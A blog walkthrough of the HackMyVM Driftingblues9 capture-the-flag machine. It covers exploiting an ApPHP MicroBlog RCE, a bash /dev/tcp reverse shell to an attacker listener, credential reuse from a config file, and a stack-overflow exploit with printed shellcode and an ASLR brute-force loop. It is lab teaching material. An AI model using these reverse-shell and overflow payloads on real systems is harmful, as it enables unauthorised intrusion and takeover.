HackMyVm Driftingblues9 Walkthrough


HackMyVm Driftingblues9 Walkthrough

Machine can be download here: https://hackmyvm.eu/machines/machine.php?vm=Driftingblues9

Nmap scan ports first,  port 80 is open.


Open port 80 in browser,  it's a tiny blog.



Check source code, we see the app name and version.

<!-- This script was generated by ApPHP MicroBlog v.1.0.1 (http://www.apphp.com/php-microblog/) -->

Search exploitdb for poc, use the RCE one.


Run nc -nlvp 1234 to listen to port 1234 at one terminal, and run the poc in another terminal, input code : /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'. Then we get reverse shell.


Next we need to be clabton. We found credentials in/var/www/html/include/base.inc.php.


We use python to spawn a term, and then su to user clapton.


The last step is to pwn the input in /home/clapton.


Download input file, check the type and security settings of the elf. (Checksec is a tool of pwntools.)

It's a 32 bit elf, and with no protection, which means we can make shellcode running on stack. That is good.

Use your favorite disassembler to check the file. It only has a simple strcpy, which is vulnerable, but with no other instructions can be used.


 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   char dest[159]; // [esp+11h] [ebp-9Fh] BYREF
 
   if ( argc <= 1 )
   {
     printf("Syntax: %s <input string>\n", *argv);
     exit(0);
   }
   strcpy(dest, argv[1]);
   return 0;
 }{
   char dest[159]; // [esp+11h] [ebp-9Fh] BYREF
 
   if ( argc <= 1 )
   {
     printf("Syntax: %s <input string>\n", *argv);
     exit(0);
   }
   strcpy(dest, argv[1]);
   return 0;
 }



When we input a long string, it will crash. So we need to get the padding length of the strings, that can make return address just be overflowed.

We use gdb-peda, create pattern, find crash address, locate the offset.

If you don't use peda, you can use pattern_create.rb and pattern_offset.rb in /usr/share/metasploit-framework/tools/exploit/.


Because the VM has gdb too, so we can run gdb to test if our calculation is correct. 0x62626262 is 'bbbb', which means our length calculation is correct, the return address is modified to 'bbbb'.


But if we run the app several time, we will found that when app crashed, the esp address is different. But we know the address range is about 0xbf??????.


That's because ASLR is enabled on the VM.


Our method is to add a long nops, so maybe eip will hit in our shellcode.

We use a classic shellcode:"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"

Also, we can generate shellcode through pwntools or msfvenom.

For pwntools, the code is:

python3 -c "from pwn import *;context(log_level='debug',arch='i386',os='linux');shellcode=asm(shellcraft.sh());print(shellcode)"

image-20210512084021824.png


And we add a loop to run the app multiple times. The key to success pwn a shell, is to make a long enough NOPS, at set a appropriate return address. Here I set nops length 0x10000, return address base 0xbf901010.

for a in {1..1000}; do echo -n $a; ./input $(python -c 'print "A" * 171 + "\x10\x10\x90\xbf" + "\x90" * 0x10000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"');done


图片.png


Here is a great tut about the pwn.

https://blog.geoda-security.com/2017/02/lord-of-r00t-walkthrough.html




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年12月    »
1234
567891011
12131415161718
19202122232425
262728293031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2